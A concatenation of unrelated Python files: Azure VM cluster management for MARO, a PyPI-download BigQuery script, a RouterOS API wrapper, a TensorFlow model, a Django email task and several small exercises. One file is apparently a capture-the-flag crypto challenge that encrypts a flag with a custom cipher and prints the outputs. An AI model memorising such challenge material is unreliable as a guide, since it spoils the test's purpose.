node_name=node_name,
cluster_details=self.cluster_details,
node_size=node_size,
export_path=parameters_file_path
)
AzureController.start_deployment(
resource_group=self.resource_group,
deployment_name=node_name,
template_file_path=template_file_path,
parameters_file_path=parameters_file_path
)
# Get node IP addresses
ip_addresses = AzureController.list_ip_addresses(
resource_group=self.resource_group,
vm_name=f"{self.cluster_id}-{node_name}-vm"
)
logger.info_green(f"VM '{node_name}' is created")
# Build join_cluster_deployment.
join_cluster_deployment = {
"mode": "grass/azure",
"master": {
"private_ip_address": self.master_private_ip_address,
"api_server": {
"port": self.master_api_server_port
},
"redis": {
"port": self.master_redis_port
}
},
"node": {
"name": node_name,
"id": node_name,
"username": self.default_username,
"public_ip_address": ip_addresses[0]["virtualMachine"]["network"]["publicIpAddresses"][0]["ipAddress"],
"private_ip_address": ip_addresses[0]["virtualMachine"]["network"]["privateIpAddresses"][0],
"node_size": node_size,
"resource_name": f"{self.cluster_id}-{node_name}-vm",
"hostname": f"{self.cluster_id}-{node_name}-vm",
"resources": {
"cpu": "all",
"memory": "all",
"gpu": "all"
},
"api_server": {
"port": self.api_server_port
},
"ssh": {
"port": self.ssh_port
}
},
"configs": {
"install_node_runtime": False,
"install_node_gpu_support": False
}
}
with open(
file=f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/nodes/{node_name}/join_cluster_deployment.yml",
mode="w"
) as fw:
yaml.safe_dump(data=join_cluster_deployment, stream=fw)
return join_cluster_deployment
def _delete_node(self, node_name: str) -> None:
"""Delete the MARO Node.
Args:
node_name (str): name of the MARO Node.
Returns:
None.
"""
logger.info(f"Deleting node '{node_name}'")
# Delete node
self.master_api_client.delete_node(node_name=node_name)
# Delete resources
self._delete_resources(
resource_group=self.resource_group,
cluster_id=self.cluster_id,
resource_name=node_name
)
# Delete azure deployment
AzureController.delete_deployment(
resource_group=self.resource_group,
deployment_name=node_name
)
# Delete node related files
shutil.rmtree(f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/nodes/{node_name}")
logger.info_green(f"Node '{node_name}' is deleted")
def _join_cluster(self, node_details: dict) -> None:
"""Join the cluster using node_details.
Args:
node_details (str): details of the MARO Node.
Returns:
None.
"""
node_name = node_details["name"]
logger.info(f"Node '{node_name}' is joining the cluster '{self.cluster_name}'")
# Make sure the node is able to connect
self.retry_connection(
node_username=node_details["username"],
node_hostname=node_details["public_ip_address"],
node_ssh_port=node_details["ssh"]["port"]
)
# Copy required files
local_path_to_remote_dir = {
f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/nodes/{node_name}/join_cluster_deployment.yml":
f"{GlobalPaths.MARO_LOCAL}/clusters/{self.cluster_name}/nodes/{node_name}"
}
for local_path, remote_dir in local_path_to_remote_dir.items():
FileSynchronizer.copy_files_to_node(
local_path=local_path,
remote_dir=remote_dir,
node_username=node_details["username"],
node_hostname=node_details["public_ip_address"],
node_ssh_port=node_details["ssh"]["port"]
)
# Remote join cluster
self.remote_join_cluster(
node_username=node_details["username"],
node_hostname=node_details["public_ip_address"],
node_ssh_port=node_details["ssh"]["port"],
master_private_ip_address=self.master_private_ip_address,
master_api_server_port=self.master_api_server_port,
deployment_path=(
f"{GlobalPaths.MARO_LOCAL}/clusters/{self.cluster_name}/nodes/{node_name}"
f"/join_cluster_deployment.yml"
)
)
logger.info_green(f"Node '{node_name}' is joined")
def start_node(self, replicas: int, node_size: str):
"""Start MARO Node VMs in parallel.
Args:
replicas (int): number of MARO Node in specific node_size to start.
node_size (str): size of the MARO Node VM, see https://docs.microsoft.com/en-us/azure/virtual-machines/sizes
for reference.
Returns:
None.
"""
# Get nodes details
nodes_details = self.master_api_client.list_nodes()
# Get startable nodes
startable_nodes = []
for node_details in nodes_details:
if node_details["node_size"] == node_size and node_details["state"]["status"] == NodeStatus.STOPPED:
startable_nodes.append(node_details["name"])
# Check replicas
if len(startable_nodes) < replicas:
raise BadRequestError(
f"No enough '{node_size}' nodes can be started, only {len(startable_nodes)} is able to start"
)
# Parallel start
params = [[startable_node] for startable_node in startable_nodes[:replicas]]
with ThreadPool(GlobalParams.PARALLELS) as pool:
pool.starmap(
self._start_node,
params
)
def _start_node(self, node_name: str):
"""Start the MARO Node VM.
Args:
node_name (str): name of the MARO Node.
Returns:
None.
"""
logger.info(f"Starting node '{node_name}'")
# Start node vm
AzureController.start_vm(
resource_group=self.resource_group,
vm_name=f"{self.cluster_id}-{node_name}-vm"
)
# Start node
self.master_api_client.start_node(node_name=node_name)
logger.info_green(f"Node '{node_name}' is started")
def stop_node(self, replicas: int, node_size: str):
"""Stop MARO Node VMs in parallel.
Args:
replicas (int): number of MARO Node in specific node_size to stop.
node_size (str): size of the MARO Node VM,
see https://docs.microsoft.com/en-us/azure/virtual-machines/sizes for reference.
Returns:
None.
"""
# Get nodes details
nodes_details = self.master_api_client.list_nodes()
# Get stoppable nodes
stoppable_nodes_details = []
for node_details in nodes_details:
if (
node_details["node_size"] == node_size and
node_details["state"]["status"] == NodeStatus.RUNNING and
self._count_running_containers(node_details) == 0
):
stoppable_nodes_details.append(node_details)
# Check replicas
if len(stoppable_nodes_details) < replicas:
raise BadRequestError(
f"No more '{node_size}' nodes can be stopped, only {len(stoppable_nodes_details)} are stoppable"
)
# Parallel stop
params = [[node_details] for node_details in stoppable_nodes_details[:replicas]]
with ThreadPool(GlobalParams.PARALLELS) as pool:
pool.starmap(
self._stop_node,
params
)
def _stop_node(self, node_details: dict):
"""Stop MARO Node VM.
Args:
node_details (dict): details of the MARO Node.
Returns:
None.
"""
node_name = node_details["name"]
logger.info(f"Stopping node '{node_name}'")
# Stop node
self.master_api_client.stop_node(node_name=node_name)
# Stop node vm
AzureController.stop_vm(
resource_group=self.resource_group,
vm_name=f"{self.cluster_id}-{node_name}-vm"
)
logger.info_green(f"Node '{node_name}' is stopped")
def _get_node_size_to_spec(self) -> dict:
"""Get node_size to spec mapping of Azure VM.
Returns:
dict: node_size to spec mapping.
"""
# List available sizes for VMs
specs = AzureController.list_vm_sizes(location=self.location)
# Get node_size_to_spec
node_size_to_spec = {}
for spec in specs:
node_size_to_spec[spec["name"]] = spec
return node_size_to_spec
@staticmethod
def _count_running_containers(node_details: dict) -> int:
"""Count running containers based on field "Status".
Args:
node_details (dict): details of the MARO Node.
Returns:
int: num of running containers.
"""
# Extract details
containers_details = node_details["containers"]
# Do counting
count = 0
for container_details in containers_details:
if container_details["Status"] == ContainerStatus.RUNNING:
count += 1
return count
# maro grass clean
def clean(self) -> None:
"""Delete running jobs, schedule and containers of the MARO Cluster.
Returns:
None.
"""
# Remote clean jobs
self.master_api_client.clean_jobs()
# Utils
@staticmethod
def _delete_resources(resource_group: str, cluster_id: int, resource_name: str) -> None:
"""Delete resources in the resource group.
Args:
resource_group (str): name of the resource group.
cluster_id (id): id of the MARO Cluster.
resource_name (str): name of the MARO Resource. e.g. node_name
Returns:
None.
"""
# Get resource list
resource_list = AzureController.list_resources(resource_group=resource_group)
# Filter resources
deletable_ids = []
for resource_info in resource_list:
if resource_info["name"].startswith(f"{cluster_id}-{resource_name}"):
deletable_ids.append(resource_info["id"])
# Delete resources
if len(deletable_ids) > 0:
AzureController.delete_resources(resource_ids=deletable_ids)
class ArmTemplateParameterBuilder:
"""Builder for ARM Template Parameters.
See https://docs.microsoft.com/en-us/azure/azure-resource-manager/templates/ for reference.
"""
@staticmethod
def create_vnet(cluster_details: dict, export_path: str) -> dict:
"""Create parameters file for vnet.
Args:
cluster_details (dict): details of the MARO Cluster.
export_path (str): location to export the parameter file.
Returns:
dict: parameter dict, should be exported to json.
"""
# Load and update parameters
with open(file=f"{GrassPaths.ABS_MARO_GRASS_LIB}/modes/azure/create_vnet/parameters.json", mode="r") as fr:
base_parameters = json.load(fr)
parameters = base_parameters["parameters"]
parameters["location"]["value"] = cluster_details["cloud"]["location"]
parameters["virtualNetworkName"]["value"] = f"{cluster_details['id']}-vnet"
# Export parameters if the path is set
if export_path:
os.makedirs(os.path.dirname(export_path), exist_ok=True)
with open(export_path, "w") as fw:
json.dump(base_parameters, fw, indent=4)
return base_parameters
@staticmethod
def create_master(cluster_details: dict, node_size: str, export_path: str) -> dict:
"""Create parameters file for MARO Master VM.
Args:
cluster_details (dict): details of the MARO Cluster.
node_size (str): node_size of the MARO Master VM.
export_path (str): path to export the parameter file.
Returns:
dict: parameter dict, should be exported to json.
"""
# Load and update parameters
with open(file=f"{GrassPaths.ABS_MARO_GRASS_LIB}/modes/azure/create_master/parameters.json", mode="r") as fr:
base_parameters = json.load(fr)
parameters = base_parameters["parameters"]
parameters["adminPublicKey"]["value"] = cluster_details["cloud"]["default_public_key"]
parameters["adminUsername"]["value"] = cluster_details["cloud"]["default_username"]
parameters["apiServerDestinationPorts"]["value"] = [cluster_details["connection"]["api_server"]["port"]]
parameters["location"]["value"] = cluster_details["cloud"]["location"]
parameters["networkInterfaceName"]["value"] = f"{cluster_details['id']}-master-nic"
parameters["networkSecurityGroupName"]["value"] = f"{cluster_details['id']}-master-nsg"
parameters["publicIpAddressName"]["value"] = f"{cluster_details['id']}-master-pip"
parameters["sshDestinationPorts"]["value"] = [cluster_details["connection"]["ssh"]["port"]]
parameters["virtualMachineName"]["value"] = f"{cluster_details['id']}-master-vm"
parameters["virtualMachineSize"]["value"] = node_size
parameters["virtualNetworkName"]["value"] = f"{cluster_details['id']}-vnet"
# Export parameters if the path is set
if export_path:
os.makedirs(os.path.dirname(export_path), exist_ok=True)
with open(export_path, "w") as fw:
json.dump(base_parameters, fw, indent=4)
return base_parameters
@staticmethod
def create_build_node_image_vm(cluster_details: dict, node_size: str, export_path: str) -> dict:
"""Create parameters file for Build Image Node VM.
Args:
cluster_details (dict): details of the MARO Cluster.
node_size (str): node_size of the Build Image Node VM.
export_path (str): path to export the parameter file.
Returns:
dict: parameter dict, should be exported to json.
"""
# Load and update parameters
with open(
file=f"{GrassPaths.ABS_MARO_GRASS_LIB}/modes/azure/create_build_node_image_vm/parameters.json",
mode="r"
) as fr:
base_parameters = json.load(fr)
parameters = base_parameters["parameters"]
parameters["adminPublicKey"]["value"] = cluster_details["cloud"]["default_public_key"]
parameters["adminUsername"]["value"] = cluster_details["cloud"]["default_username"]
parameters["location"]["value"] = cluster_details["cloud"]["location"]
parameters["networkInterfaceName"]["value"] = f"{cluster_details['id']}-build-node-image-nic"
parameters["networkSecurityGroupName"]["value"] = f"{cluster_details['id']}-build-node-image-nsg"
parameters["publicIpAddressName"]["value"] = f"{cluster_details['id']}-build-node-image-pip"
parameters["sshDestinationPorts"]["value"] = [cluster_details["connection"]["ssh"]["port"]]
parameters["virtualMachineName"]["value"] = f"{cluster_details['id']}-build-node-image-vm"
parameters["virtualMachineSize"]["value"] = node_size
parameters["virtualNetworkName"]["value"] = f"{cluster_details['id']}-vnet"
# Export parameters if the path is set
if export_path:
os.makedirs(os.path.dirname(export_path), exist_ok=True)
with open(export_path, "w") as fw:
json.dump(base_parameters, fw, indent=4)
return base_parameters
@staticmethod
def create_node(node_name: str, cluster_details: dict, node_size: str, export_path: str) -> dict:
"""Create parameters file for MARO Node VM.
Args:
cluster_details (dict): details of the MARO Cluster.
node_name (str): name of the MARO Node.
node_size (str): node_size of the MARO Node VM.
export_path (str): path to export the parameter file.
Returns:
dict: parameter dict, should be exported to json.
"""
# Load and update parameters
with open(file=f"{GrassPaths.ABS_MARO_GRASS_LIB}/modes/azure/create_node/parameters.json", mode="r") as fr:
base_parameters = json.load(fr)
parameters = base_parameters["parameters"]
parameters["adminPublicKey"]["value"] = cluster_details["cloud"]["default_public_key"]
parameters["adminUsername"]["value"] = cluster_details["cloud"]["default_username"]
parameters["imageResourceId"]["value"] = AzureController.get_image_resource_id(
resource_group=cluster_details["cloud"]["resource_group"],
image_name=f"{cluster_details['id']}-node-image"
)
parameters["location"]["value"] = cluster_details["cloud"]["location"]
parameters["networkInterfaceName"]["value"] = f"{cluster_details['id']}-{node_name}-nic"
parameters["networkSecurityGroupName"]["value"] = f"{cluster_details['id']}-{node_name}-nsg"
parameters["publicIpAddressName"]["value"] = f"{cluster_details['id']}-{node_name}-pip"
parameters["sshDestinationPorts"]["value"] = [cluster_details["connection"]["ssh"]["port"]]
parameters["virtualMachineName"]["value"] = f"{cluster_details['id']}-{node_name}-vm"
parameters["virtualMachineSize"]["value"] = node_size
parameters["virtualNetworkName"]["value"] = f"{cluster_details['id']}-vnet"
# Export parameters if the path is set
if export_path:
os.makedirs(os.path.dirname(export_path), exist_ok=True)
with open(export_path, "w") as fw:
json.dump(base_parameters, fw, indent=4)
return base_parameters
|
#!/usr/bin/env python
print ('hello')
|
#!/usr/bin/env python2
#
# Print out a few IEEE double representations related to the Duktape fastint
# number model.
#
# NOTE: signed zero does not work correctly here.
#
import struct
import math
def isFastint(x):
if math.floor(x) == x and \
x >= -(2**47) and \
x < (2**47) and \
True: # FIXME: not neg zero
return True
return False
def stringRep(x):
tmp = struct.pack('>d', x)
tmphex = tmp.encode('hex')
sgnexp = (ord(tmp[0]) << 8) + ord(tmp[1])
sgn = (sgnexp) >> 15
exp = (sgnexp & 0x7ff0) >> 4
manthex = tmphex[3:]
return '%s sgn=%d exp=%d sgnexp=%x manthex=%s' % (tmphex, sgn, exp, sgnexp, manthex)
def main():
for i in [ -(2**47) - 1,
-(2**47),
-(2**47) + 1,
-(2**32) - 1,
-(2**32),
-(2**32) + 1,
-(long(0xdeadbeef)),
-9,
-8,
-8,
-7,
-6,
-5,
-4,
-3,
-2,
-1,
-0,
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
long(0xdeadbeef),
(2**32) - 1,
(2**32),
(2**32) + 1,
(2**47) - 1,
(2**47)
]:
print('%d %x (fastint=%s): %s' % (i, i, str(isFastint(i)), stringRep(i)))
if __name__ == '__main__':
main()
|
#!/usr/bin/env python3
import os
from google.cloud import bigquery
import click
@click.command()
@click.option('--credentials', '-c', type=click.Path(exists=True), help='Path to your google API key, json file')
@click.option('--output', '-o', type=click.Path(exists=False), help='Output file (defaults to scikit-hep-FROM-TO.csv)')
@click.option('--from', '-f', 'from_', default='20190531', show_default=True, help='From date')
@click.option('--to', '-t', default='20250101', show_default=True, help='To date')
def main(credentials, output, from_, to):
if credentials is not None:
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = credentials
if output is None:
output = 'scikit-hep-{from_}-{to}.csv'.format(from_=from_, to=to)
client = bigquery.Client()
sql = """
SELECT
timestamp,
country_code,
file.project AS file_project,
file.version AS file_version,
file.type AS file_type,
details.installer.version AS details_installer_version,
details.python AS details_python,
details.distro.name AS details_distro_name,
details.distro.version AS details_distro_version,
details.distro.libc.version AS details_distro_libc_version,
details.system.name AS details_system_name,
details.system.release AS details_system_release,
details.cpu AS details_cpu,
details.openssl_version AS details_openssl_version,
details.setuptools_version AS details_setuptools_version
FROM `the-psf.pypi.downloads*`
WHERE
_TABLE_SUFFIX BETWEEN '{from_}' AND '{to}'
AND details.installer.name = 'pip'
AND file.project IN (
'aghast',
'awkward',
'awkward0',
'awkward1',
'boost-histogram',
'decaylanguage',
'excursion',
'formulate',
'hepstats',
'hepunits',
'hist',
'histoprint',
'iminuit',
'madminer',
'mplhep',
'numpythia',
'particle',
'probfit',
'pyBumpHunter',
'pyhf',
'pyjet',
'pylhe',
'reana-client',
'root-numpy',
'root-pandas',
'rootpy',
'scikit-hep',
'scikit-hep-testdata',
'scikit-optimize',
'uhi',
'uproot',
'uproot3',
'uproot4',
'uproot-methods',
'uproot3-methods',
'vector',
'vegascope',
'yadage'
)
""".format(from_=from_, to=to)
# Run a Standard SQL query using the environment's default project
df = client.query(sql).to_dataframe()
df.to_csv(output, index=False)
if __name__ == '__main__':
main()
|
for the selected text
print('hello')
print('world')
print('!') |
import chess
#creates the board
board = chess.Board()
#shows chess board
print(board)
repeat = 1
while repeat < 6:
board.legal_moves
#White move
Whitemove = input("Enter your move in notation form: ")
board.push_san(Whitemove)
print(board)
Blackmove = input("Enter your move: ")
board.push_san(Blackmove)
print(board)
#ENDGAMES
#checks for check
check = board.is_check()
checkmate = board.is_checkmate()
draw = board.is_stalemate()
if check:
print("You are in check!")
if checkmate:
print("your opponent checkmated you...")
break
if draw:
print("Everyone won it is a stalemate...")
break
|
from a2s import A2S
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import hashlib
from uuid import uuid4
key = uuid4().bytes
cipher = A2S(key)
p = []
c = []
for _ in range(3):
plaintext = uuid4().bytes
p.append(plaintext.hex())
ciphertext = cipher.encrypt_block(plaintext)
c.append(ciphertext.hex())
flag = open("flag.txt", "rb").read()
sha1 = hashlib.sha1()
sha1.update(str(key).encode('ascii'))
new_key = sha1.digest()[:16]
iv = uuid4().bytes
cipher = AES.new(new_key, AES.MODE_CBC, IV=iv)
encrypted_flag = cipher.encrypt(pad(flag, 16))
print('plaintexts = ', p)
print('ciphertexts = ', c)
print('iv = ', iv.hex())
print('encrypted_flag = ', encrypted_flag.hex())
print(hex(key[0]), hex(key[-1]))
|
class RouterOsBinaryResource(object):
def __init__(self, communicator, path):
self.communicator = communicator
self.path = clean_path(path)
def get(self, **kwargs):
return self.call('print', {}, kwargs)
def get_async(self, **kwargs):
return self.call_async('print', {}, kwargs)
def detailed_get(self, **kwargs):
return self.call('print', {'detail': ''}, kwargs)
def detailed_get_async(self, **kwargs):
return self.call_async('print', {'detail': ''}, kwargs)
def set(self, **kwargs):
return self.call('set', kwargs)
def set_async(self, **kwargs):
return self.call('set', kwargs)
def add(self, **kwargs):
return self.call('add', kwargs)
def add_async(self, **kwargs):
return self.call_async('add', kwargs)
def remove(self, **kwargs):
return self.call('remove', kwargs)
def remove_async(self, **kwargs):
return self.call_async('remove', kwargs)
def call(self, command, arguments=None, queries=None,
additional_queries=()):
return self.call_async(command, arguments=arguments, queries=queries,
additional_queries=additional_queries).get()
def call_async(self, command, arguments=None, queries=None,
additional_queries=()):
return self.communicator.call(
self.path, command, arguments=arguments, queries=queries,
additional_queries=additional_queries)
def __repr__(self):
return type(self).__name__ + '({path})'.format(path=self.path)
class RouterOsResource(RouterOsBinaryResource):
def __init__(self, communicator, path, structure):
self.structure = structure
super(RouterOsResource, self).__init__(communicator, path)
def call_async(self, command, arguments=None, queries=None,
additional_queries=()):
arguments = self.transform_dictionary(arguments or {})
queries = self.transform_dictionary(queries or {})
promise = self.communicator.call(
self.path, command, arguments=arguments, queries=queries,
additional_queries=additional_queries)
return self.decorate_promise(promise)
def transform_dictionary(self, dictionary):
return dict(self.transform_item(item) for item in dictionary.items())
def transform_item(self, item):
key, value = item
return (key, self.structure[key].get_mikrotik_value(value))
def decorate_promise(self, promise):
return TypedPromiseDecorator(promise, self.structure)
class TypedPromiseDecorator(object):
def __init__(self, inner, structure):
self.inner = inner
self.structure = structure
def __iter__(self):
return map(self.transform_dictionary, self.inner)
def get(self):
response = self.inner.get()
return response.map(self.transform_dictionary)
def transform_dictionary(self, row):
return dict(self.transform_item(item) for item in row.items())
def transform_item(self, item):
key, value = item
return (key, self.structure[key].get_python_value(value))
def clean_path(path):
if not path.endswith('/'):
path += '/'
if not path.startswith('/'):
path = '/' + path
return path
|
bicycles = ['tek','cannondale','redline','specialized']
print (bicycles)
print(bicycles[0])
print(bicycles[0].title())
print(bicycles[-1])
# f-strings
message= f"My first bike was a {bicycles[0].title()}."
print(message)
motorcycles = ['honda','yamaha', 'suzuki']
print(motorcycles)
# replace
motorcycles[0] = 'ducati'
print(motorcycles)
# add
motorcycles = []
motorcycles.append('honda')
motorcycles.append('yamaha')
motorcycles.append('suzuki')
print(motorcycles)
# insert
motorcycles.insert(0,'ducati')
print(motorcycles)
# remove
del motorcycles[0]
print(motorcycles)
# remove with pop FIFO
popped_motorcycle = motorcycles.pop()
print(motorcycles)
print(popped_motorcycle)
# remove the first element LIFO
from collections import deque
queue = deque(["Eric", "John", "Michael"])
queue.append("Terry")
queue.append("Graham")
print(queue)
queue.popleft()
print(queue)
# list comprehension
squares = []
for x in range(10):
squares.append(x ** 2)
print(squares)
example = list(map(lambda x: x**2, range(10)))
print(example)
example1= [x**2 for x in range(10)]
print(example1)
|
"""
Copyright 2020 Google LLC.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import tensorflow as tf
from smart_news_query_embeddings.models.bert_keras_model import BertKerasModel
from tensorflow.keras.layers import Dense, Input, Flatten, Dropout, concatenate, BatchNormalization, LeakyReLU
from tensorflow.keras.models import Model
from tensorflow.keras.optimizers import Adam
class TwoTowerModel(BertKerasModel):
def build_model(self):
self.flatten = Flatten(name="flatten")
self.dense1_1 = Dense(self.dense_size, name="dense1_1")
if self.use_batch_norm:
self.bn1 = BatchNormalization(name="bn1")
self.relu1_1 = LeakyReLU(name="relu1_1")
self.dropout1 = Dropout(self.dropout_rate)
self.dense1_2 = Dense(self.dense_size, name="dense1_2")
if self.use_batch_norm:
self.bn2 = BatchNormalization(name="bn2")
self.relu1_2 = LeakyReLU(name="relu1_2")
self.dropout2 = Dropout(self.dropout_rate)
self.dense2_1 = Dense(self.dense_size, name="dense2_1")
self.relu2_1 = LeakyReLU(name="relu2_1")
self.dense2_2 = Dense(self.dense_size, name="dense2_2")
self.relu2_2 = LeakyReLU(name="relu2_2")
self.final_dense = Dense(128, name="final_dense")
self.final_relu = LeakyReLU(name="final_relu")
self.output_layer = Dense(2, activation="sigmoid", name="output_dense")
self.embedding_layers = [
self.bert_layer,
self.flatten,
self.dense1_1,
self.bn1,
self.relu1_1,
self.dropout1,
self.dense1_2,
self.bn2
] if self.use_batch_norm else [
self.bert_layer,
self.flatten,
self.dense1_1,
self.relu1_1,
self.dropout1,
self.dense1_2,
]
def call(self, inputs):
input_ids, input_labels = inputs
out1 = self.bert_layer(input_ids)
out1 = self.flatten(out1)
out1 = self.dense1_1(out1)
if self.use_batch_norm:
out1 = self.bn1(out1)
out1 = self.relu1_1(out1)
out1 = self.dropout1(out1)
out1 = self.dense1_2(out1)
if self.use_batch_norm:
out1 = self.bn2(out1)
out1 = self.relu1_2(out1)
out1 = self.dropout2(out1)
out2 = self.dense2_1(input_labels)
out2 = self.relu2_1(out2)
out2 = self.dense2_2(out2)
out2 = self.relu2_2(out2)
out = concatenate([out1, out2])
out = self.final_dense(out)
out = self.final_relu(out)
out = self.output_layer(out)
return out
|
from django.core.mail import send_mail
from meiduo_mall.settings import dev
import logging
logger = logging.getLogger('django')
from celery_tasks.main import celery_app
@celery_app.task(name='send_verify_main')
def send_verify_email(to_email, verify_url):
# 标题
subject = '商城邮箱验证'
# 发送内容
html_message = '<p>尊敬的用户您好!</p>' \
'<p>感谢您使用美多商城。</p>' \
'<p>您的邮箱为:%s 。请点击此链接激活您的邮箱:</p>' \
'<p><a href="%s">%s</a></p>' % (to_email, verify_url, verify_url)
# 进行发送
result = send_mail(subject,
'',
dev.EMAIL_FROM,
[to_email],
html_message=html_message)
return result |
n=int(input());r=""
for _ in range(n):
c=[False]*26;a=0
s=input();l=len(s)
for i in range(l):
c[ord(s[i])-ord('A')]=True
for i in range(26):
if not c[i]:
a+=i+65
r+=str(a)+'\n'
print(r,end="")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.